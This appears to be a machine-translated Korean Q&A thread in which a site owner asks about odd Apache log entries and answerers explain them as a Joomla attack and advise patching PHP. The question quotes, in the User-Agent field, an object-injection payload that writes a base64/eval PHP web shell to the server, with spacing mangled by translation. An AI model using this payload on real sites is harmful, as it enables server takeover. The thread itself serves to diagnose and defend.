일부 스크립팅 공격 기술에 사용자 에이전트 식별이 사용 되었습니까?


10

내 사이트의 Apache 액세스 로그 항목은 일반적으로 다음과 같습니다.

207.46.13.174--[31 / Oct / 2016 : 10 : 18 : 55 +0100] "GET / contact HTTP / 1.1"200256 "-" "Mozilla / 5.0 (호환; bingbot / 2.0; + http : // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607

거기에서 사용자 에이전트 필드를 볼 수 있습니다. 그러나 오늘 나는 또한 다음과 같이 사용되는 사용자 에이전트 필드를 발견했습니다.

62.210.162.42--[31 / Oct / 2016 : 11 : 24 : 19 +0100] "GET / HTTP / 1.1"200 399 "-" "} __ test | O : 21 :"JDatabaseDriverMysqli ": 3 : {s : 2 : "fc"; O : 17 : "JSimplepieFactory": 0 : {} s : 21 : "\ 0 \ 0 \ 0disconnectHandlers"; a : 1 : {i : 0; a : 2 : {i : 0; O : 9 : "SimplePie": 5 : {s : 8 : "sanitize"; O : 20 : "JDatabaseDriverMysql": 0 : {} s : 8 : "feed_url"; s : 242 : "file_put_contents ($ _ SERVER ["DOCUMENT_ROOT " ] .chr (47). "sqlconfigbak.php", "| = | \ x3C".chr (63). "php \ x24mujj = \ x24_POST [ 'z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST [ 'z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); 종료;"; s : 19 : " cache_name_function "; s : 6 :"assert "; s : 5 :"cache "; b : 1; s : 11 :"cache_class "; O : 20 :"JDatabaseDriverMysql ": 0 : {}} i : 1; s : 4 :"init ";}} : 13 :"\ 0 \ 0 \ 0connection "; b : 1;} ~ Ů"0.304 BYPASS 10.10.36.125:104 0.304

이것이 공격입니까? 다음 로그 항목이 sqlconfigbak.php스크립트에 언급 된 파일 (코드 200)을 성공적으로 검색 한 것으로 보입니다 . 파일 시스템에서 파일을 찾을 수 없지만 :

62.210.162.42--[31 / Oct / 2016 : 11 : 24 : 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1"200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (호환; Googlebot / 2.1; + http : //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244

여기서 무슨 일이 있었습니까?

답변:



4

연결 한 IP 주소가 Google 호스트 이름으로 확인되지 않으므로 Google이 아닙니다. 개인 또는 봇이 사이트에서 취약점을 검색하고 있습니다. 첫 번째는 Joomla 취약점을 찾으려고합니다.

이러한 이벤트는 대부분의 웹 사이트에서 정기적으로 발생하므로 모범 사례를 따르고 웹 사이트를 강화해야하며 프로세스가 길며 온라인 자습서를 찾아 따라야합니다.


알았어 고마워 나는 이것을 찾기 전에 이미 웹 사이트를 강화했다. 솔직히, 그러한 공격 벡터를 찾는 것은 조금 놀랐습니다.
miroxlav

2

다른 답변에 덧붙여이 공격이 효과가 있다는 사실은 이전의 안전하지 않은 PHP 버전을 실행하고 있음을 나타냅니다. 이 공격이 악용 한 버그에 대한 픽스는 2015 년 9 월에 릴리스되었습니다. 업데이트 프로세스를 실행하고 최신 버전의 PHP를 사용하십시오. 인터넷에 연결된 다른 오래된 프로그램도 확인하십시오. 서버가 최소 1 년 동안 최신 상태로 유지되지 않은 것 같습니다.


좋은 지적!
closetnoc
당사 사이트를 사용함과 동시에 당사의 쿠키 정책개인정보 보호정책을 읽고 이해하였음을 인정하는 것으로 간주합니다.
Licensed under cc by-sa 3.0 with attribution required.